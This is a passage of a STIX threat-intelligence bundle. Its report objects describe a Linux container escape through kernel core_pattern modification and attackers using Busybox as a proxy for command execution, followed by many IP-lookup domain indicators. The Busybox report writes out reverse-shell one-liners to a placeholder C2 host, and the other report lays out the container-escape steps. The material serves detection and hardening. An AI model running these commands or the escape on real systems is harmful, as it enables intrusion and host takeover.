      "object_refs": [
        "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
        "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_proxy_execution_via_systemd_run.toml"
        }
      ],
      "confidence": 40
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--59f348cb-9ef6-5341-9b2e-325eadda7b79",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Escape to Host",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1611",
          "url": "https://attack.mitre.org/techniques/T1611"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--355f611b-798b-50d4-b1e4-7c65fa153489",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a234a231-4197-5959-8ba9-94fbac0893a4",
      "target_ref": "attack-pattern--59f348cb-9ef6-5341-9b2e-325eadda7b79"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a234a231-4197-5959-8ba9-94fbac0893a4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Linux Container Escape via Kernel core_pattern Modification",
      "description": "## Overview\n\nThis threat describes a critical container escape and privilege escalation vulnerability within the Linux kernel, enabling attackers to gain root access on the host system from a compromised container. The vulnerability leverages the non-namespaced nature of the kernel's core-dump handler mechanism. A malicious process running within a container can write to the `/proc/sys/kernel/core_pattern` file, a kernel interface that specifies how core-dumps are handled. If the value written to this file begins with a pipe symbol ('|'), the kernel executes the remainder of the string as a command, running it from the host's initial namespace with root privileges, regardless of the crashing process's origin. This provides a direct vector for a containerized attacker to execute arbitrary commands on the underlying host, circumventing container isolation.\n\n## Attack Chain\n\n1.  An attacker gains initial access to a Linux container, typically through a vulnerable application or misconfiguration.\n2.  Within the compromised container, the attacker identifies their ability to modify kernel parameters, specifically the `/proc/sys/kernel/core_pattern` file.\n3.  The attacker creates or locates a malicious script on the container's filesystem that, if executed on the host, would grant them persistent root access or other objectives.\n4.  The attacker modifies `/proc/sys/kernel/core_pattern` within the container, setting its value to `|/path/to/malicious_script` (or similar), directing the kernel to execute their script upon a core-dump.\n5.  The attacker then deliberately triggers a core-dump from any process inside the container.\n6.  The Linux kernel, upon detecting the core-dump, invokes the `core_pattern` handler. Due to the vulnerability, it executes `/path/to/malicious_script` from the host's initial namespace as root.\n7.  The malicious script executes with root privileges on the host, allowing the attacker to achieve full host compromise and maintain persistence outside the container.\n\n## Impact\n\nSuccessful exploitation of this vulnerability leads to a full container-to-host escape and privilege escalation. An attacker initially confined to a container gains root-level access to the underlying host system. This can result in complete control over the host, enabling data exfiltration, deployment of additional malware (e.g., ransomware, cryptominers), installation of backdoors, and disruption of other services or containers running on the same host. The impact is severe, as it undermines the fundamental security isolation provided by containerization technologies.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Potential Container Escape via Kernel core_pattern Modification\" to detect attempts to modify the `core_pattern` from within containers.\n*   Ensure that container runtime security policies restrict modification of `/proc/sys/kernel/core_pattern` or prevent execution of `sysctl -w` commands that alter kernel parameters, particularly from untrusted containerized applications.\n*   Implement strong ingress and egress filtering for containers to prevent outbound communication to attacker-controlled infrastructure post-escape.\n*   Regularly scan containers and host systems for vulnerabilities and misconfigurations that could allow initial container compromise.\n",
      "published": "2026-07-03T15:17:46Z",
      "labels": [
        "container-escape",
        "privilege-escalation",
        "linux",
        "kubernetes",
        "endpoint"
      ],
      "object_refs": [
        "attack-pattern--59f348cb-9ef6-5341-9b2e-325eadda7b79"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.sysdig.com/blog/runc-container-escape-vulnerabilities"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/opencontainers/runc/security/advisories/GHSA-cgrx-mc8f-2prm"
        },
        {
          "source_name": "reference",
          "url": "https://kubehound.io/reference/attacks/CE_UMH_CORE_PATTERN/"
        },
        {
          "source_name": "reference",
          "url": "https://aquasecurity.github.io/tracee/latest/docs/events/builtin/signatures/core_pattern_modification/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--66533e05-cd40-5a5f-8b43-e4ce690344b8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e3346361-cbc9-53f5-b929-7cbd5c018d94",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ac5ee46d-1dea-5bf5-9677-e39480cad255",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e3346361-cbc9-53f5-b929-7cbd5c018d94",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Binary Proxy Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1218",
          "url": "https://attack.mitre.org/techniques/T1218"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d3b4a987-21ec-5058-8fcc-cfa22fc99607",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e3346361-cbc9-53f5-b929-7cbd5c018d94",
      "target_ref": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--e3346361-cbc9-53f5-b929-7cbd5c018d94",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious Command Execution via Busybox Proxy",
      "description": "## Overview\n\nAttackers are leveraging the Busybox utility, a collection of common Unix utilities combined into a single executable, as a proxy for malicious command execution and to establish command and control (C2) channels on compromised Linux systems. This technique allows adversaries to hide their activities behind a trusted, legitimate binary, making it harder for security tools to detect. Typically, the attacker drops a malicious script or binary in temporary or non-standard locations such as `/tmp` or `/dev/shm`, then uses `busybox sh` or similar applets to invoke network utilities like `nc` (netcat), `openssl`, or directly interact with `/dev/tcp` or `/dev/udp` to establish reverse shells or C2 communications. This method aims to evade detection by circumventing process monitoring that might otherwise flag direct execution of these utilities from suspicious locations, providing a stealthy means for post-exploitation activities.\n\n## Attack Chain\n\n1.  **Initial Compromise**: An attacker gains initial access to a Linux system through an unspecified mechanism, such as exploiting a vulnerable service, leveraging compromised credentials, or successful phishing.\n2.  **Staging Malicious Artifacts**: The attacker stages a malicious script or binary (e.g., a reverse shell payload, a C2 client) in a temporary or non-standard directory like `/tmp`, `/var/tmp`, or `/dev/shm` to avoid detection and system hardening.\n3.  **Proxy Execution via Busybox**: The attacker executes the `busybox` utility, often calling it with a shell applet (e.g., `busybox sh`) and providing arguments that invoke the staged artifact or directly initiate network communication.\n4.  **Establish Command and Control**: Busybox acts as a proxy, executing commands to establish a reverse shell (e.g., `busybox sh -c 'nc -e /bin/bash C2_IP PORT'`) or connect to an attacker-controlled C2 server (e.g., `busybox sh -i \u003c\u0026 /dev/tcp/C2_IP/PORT \u003e\u00260 2\u003e\u00261`).\n5.  **Evasion of Detection**: This proxy execution method helps attackers evade detection by bypassing basic process monitoring that might flag direct execution of `nc`, `bash`, or other suspicious binaries from unusual locations, as the observed parent process is the legitimate `busybox` binary.\n6.  **Post-Exploitation Activity**: With the C2 channel established, the attacker proceeds with further post-exploitation activities, including downloading additional tools, exfiltrating data, establishing persistence mechanisms (e.g., cron jobs, systemd services), or moving laterally within the network.\n7.  **Impact Realization**: The successful exploitation leads to unauthorized access, data theft, full system compromise, or integration of the compromised host into a botnet.\n\n## Impact\n\nSuccessful exploitation of this technique can lead to full system compromise, unauthorized data access, and exfiltration of sensitive information from Linux hosts. By using Busybox as a proxy, attackers can maintain a covert presence, making it difficult for defenders to identify and mitigate their activities. Organizations in any sector utilizing Linux systems are potential targets. The ultimate impact can range from significant financial losses due to data breaches to operational disruption from ransomware or destructive attacks, as attackers gain the ability to execute arbitrary commands and control the compromised system remotely.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Suspicious Busybox Command Execution with Shell Proxy\" to your SIEM and tune it for your environment.\n*   Enable comprehensive `process_creation` logging for all Linux endpoints to capture `Image`, `CommandLine`, `ParentImage`, and `ParentCommandLine` details.\n*   Harden your Linux environment by restricting Busybox execution to approved administrative uses and limiting unnecessary outbound network egress.\n*   Where feasible, mount temporary directories such as `/tmp`, `/var/tmp`, and `/dev/shm` with the `noexec` option to prevent the execution of binaries or scripts from these locations.\n",
      "published": "2026-07-06T14:30:36Z",
      "labels": [
        "execution",
        "defense-evasion",
        "command-and-control",
        "linux",
        "proxy",
        "busybox"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_busybox_unusual_execution.toml"
        }
      ],
      "confidence": 40
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--dc9556b6-9e18-574e-b6a1-aa8c933f8c0a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ip-api.com",
      "pattern": "[domain-name:value = 'ip-api.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2e1b5bf5-6e8b-5f2b-9e1c-813265f0fb66",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--dc9556b6-9e18-574e-b6a1-aa8c933f8c0a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--573f060b-079f-5a42-ba1c-fa72503e657a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: checkip.dyndns.org",
      "pattern": "[domain-name:value = 'checkip.dyndns.org']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--82bdbd53-9e1d-5a05-b367-fd7b52d342fe",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--573f060b-079f-5a42-ba1c-fa72503e657a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--68bdac5d-5e73-5d1c-b21c-f32e2c2c3a2a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: api.ipify.org",
      "pattern": "[domain-name:value = 'api.ipify.org']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d0b2436b-5197-5336-aa62-b45f57d6b947",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--68bdac5d-5e73-5d1c-b21c-f32e2c2c3a2a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--dcb0b0cb-cffe-54bd-9c19-ac5ab945780e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: whatismyip.akamai.com",
      "pattern": "[domain-name:value = 'whatismyip.akamai.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--63b06e61-ed1f-5d5d-a7f9-618c6dfe551c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--dcb0b0cb-cffe-54bd-9c19-ac5ab945780e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a8f1a252-cad5-5317-9fff-115432237953",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: bot.whatismyipaddress.com",
      "pattern": "[domain-name:value = 'bot.whatismyipaddress.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cc099cd7-954d-5550-a15a-b3da42b5fe35",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--a8f1a252-cad5-5317-9fff-115432237953"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--038bc501-170f-503a-8eac-77df1d55edb1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ifcfg.me",
      "pattern": "[domain-name:value = 'ifcfg.me']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--24ca8ec6-d5f4-522e-9d03-a7869235c1be",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--038bc501-170f-503a-8eac-77df1d55edb1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1f2c0941-8caf-52b8-b73d-8984f14bd230",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ifconfig.me",
      "pattern": "[domain-name:value = 'ifconfig.me']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9635b455-7309-534c-a0b5-13da2099b4db",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--1f2c0941-8caf-52b8-b73d-8984f14bd230"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9aef24e8-892b-53e5-a592-5c53be998c32",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ident.me",
      "pattern": "[domain-name:value = 'ident.me']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2b8ab199-5301-50c4-811a-07f74ffde92f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--9aef24e8-892b-53e5-a592-5c53be998c32"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5f771494-61c4-5227-9119-a1f5e6fda535",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ipof.in",
      "pattern": "[domain-name:value = 'ipof.in']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--92e23125-af3a-5a3b-8d40-59c1d6456cdd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--5f771494-61c4-5227-9119-a1f5e6fda535"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fd046611-e1d4-5440-8551-0dcba76856a6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ip.tyk.nu",
      "pattern": "[domain-name:value = 'ip.tyk.nu']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8f1f0209-d984-5750-b707-2c3684e042a1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--fd046611-e1d4-5440-8551-0dcba76856a6"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b09fc91f-129c-5360-8771-e14e7300a889",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: icanhazip.com",
      "pattern": "[domain-name:value = 'icanhazip.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d849cbce-a566-5529-bdb3-5dba16bb43ae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--b09fc91f-129c-5360-8771-e14e7300a889"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--bc44b953-8dfc-5e18-8b2c-b33cae0f4205",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: curlmyip.com",
      "pattern": "[domain-name:value = 'curlmyip.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e54d9551-b871-5c09-8fb3-6439bede20ac",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--bc44b953-8dfc-5e18-8b2c-b33cae0f4205"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5b2972dd-a74d-53aa-be76-03cc740fbf9e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: wgetip.com",
      "pattern": "[domain-name:value = 'wgetip.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5a668f6a-4391-5839-810a-2adb816ba083",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--5b2972dd-a74d-53aa-be76-03cc740fbf9e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7b085f56-e3e3-5b05-9d9b-c5283cd8ad48",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: eth0.me",
      "pattern": "[domain-name:value = 'eth0.me']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--831ae972-3a45-54b0-a28b-5304dd66b961",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--7b085f56-e3e3-5b05-9d9b-c5283cd8ad48"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6d256ee4-2a40-5268-b4f1-0bf4e3009a35",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ipecho.net",
      "pattern": "[domain-name:value = 'ipecho.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--337b09e7-28cb-5437-a9c4-a489aa647bd6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--6d256ee4-2a40-5268-b4f1-0bf4e3009a35"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b03eb34e-72bb-55b5-9839-170024e076e7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ip.appspot.com",
      "pattern": "[domain-name:value = 'ip.appspot.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--37e7032a-70d2-5738-bebe-a8fe07cd00f5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--b03eb34e-72bb-55b5-9839-170024e076e7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--12c372d5-abdc-51b7-a874-a8422f574ef3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: api.myip.com",
      "pattern": "[domain-name:value = 'api.myip.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--00db85ec-bd79-5c9a-86cc-c6655519fe49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--12c372d5-abdc-51b7-a874-a8422f574ef3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c62c15a0-29a9-5c15-976a-095662da2557",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: geoiptool.com",
      "pattern": "[domain-name:value = 'geoiptool.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2b81c5c0-f331-53c6-9eed-96ef0a1480ce",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--c62c15a0-29a9-5c15-976a-095662da2557"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cdb33161-85f2-55fc-bd7f-8f0fb9f3cb75",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: api.2ip.ua",
      "pattern": "[domain-name:value = 'api.2ip.ua']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0c82262a-c7de-598a-a37b-0fae457fe035",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--cdb33161-85f2-55fc-bd7f-8f0fb9f3cb75"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c4d22d11-af0f-511e-9838-c5d28a7a0372",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: api.ip.sb",
      "pattern": "[domain-name:value = 'api.ip.sb']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1202931f-627a-5e2a-a636-4a4eb2e6bc4d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--c4d22d11-af0f-511e-9838-c5d28a7a0372"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f1e767eb-113b-57b0-8cb9-80a0f5bad2b0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ipinfo.io",
      "pattern": "[domain-name:value = 'ipinfo.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b31ceff7-d004-5c43-84f4-7640ea8a94cf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--f1e767eb-113b-57b0-8cb9-80a0f5bad2b0"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7f50c920-483f-5b37-a0d4-ce21ba4a834f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: checkip.amazonaws.com",
      "pattern": "[domain-name:value = 'checkip.amazonaws.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c265e242-a779-508f-a730-04c768d29628",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--7f50c920-483f-5b37-a0d4-ce21ba4a834f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--046aa294-f2d2-5511-bf05-c8fdc8bbd0f7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: wtfismyip.com",
      "pattern": "[domain-name:value = 'wtfismyip.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4874dcfa-e3fa-5ba5-9f1a-9046ca6016cd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--046aa294-f2d2-5511-bf05-c8fdc8bbd0f7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b5e8f71b-fe09-5913-8cb7-a8e6bf117f7e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: freegeoip.net",
      "pattern": "[domain-name:value = 'freegeoip.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--02dc7982-9825-5c4a-b295-93343596255f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5bb0d883-4e18-5b81-9e99-5599e3a00c08",
      "target_ref": "indicator--b5e8f71b-fe09-5913-8cb7-a8e6bf117f7e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c4c80e07-4b62-5bdc-8094-133f5817360b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: freegeoip.app",
      "pattern": "[domain-name:value = 'freegeoip.app']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T14:29:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ee5c5962-f6ce-5e71-9812-830b97b72f9b",
